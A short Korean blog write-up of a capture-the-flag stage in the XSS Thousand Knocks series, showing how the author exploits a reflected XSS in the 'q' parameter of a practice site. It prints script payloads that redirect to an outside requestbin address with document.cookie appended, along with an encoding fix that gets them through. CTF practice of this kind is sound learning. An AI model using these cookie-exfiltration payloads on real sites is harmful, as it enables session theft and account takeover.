링크를 들어가면 아래와 같은 링크로 들어가게 된다.
http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=XSS
q=뒤에 있는 내용이 출력되는 기능을 가지고 있는 웹페이지이다.
그래서 아래와 같은 url을 보내보았다.
http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>location.href='http://requestbin.fullcontact.com/x1n9b3x1'+document.cookie</script>
그런데 이렇게 보내니까 failed csrf check! 라고 뜨면서 실패가 된다.
고민을 해보다가 +의 문제인거같아서 http encoding하면 나오는 %2B를 넣어서 보내보았다.
http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>location.href='http://requestbin.fullcontact.com/x1n9b3x1'%2Bdocument.cookie</script>
근데 자꾸 none이 뜬다... 그 이유가 뭘까?
http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>location.href='http://requestbin.fullcontact.com/x1n9b3x1?a='%2Bdocument.cookie</script>
변수값을 안 줘서 안 뜬거였다....세상 바보...
이렇게 하면 flag가 제대로 온다. 성공
'WebHacking > XSS Thousand Knocks Write-Up' 카테고리의 다른 글
| XSS Thousand Knocks Stage4 write up (0) | 2018.07.18 |
|---|---|
| XSS Thousand Knocks Stage3 write up (0) | 2018.07.18 |
| XSS thousand Knocks stage1 writeup (0) | 2018.07.18 |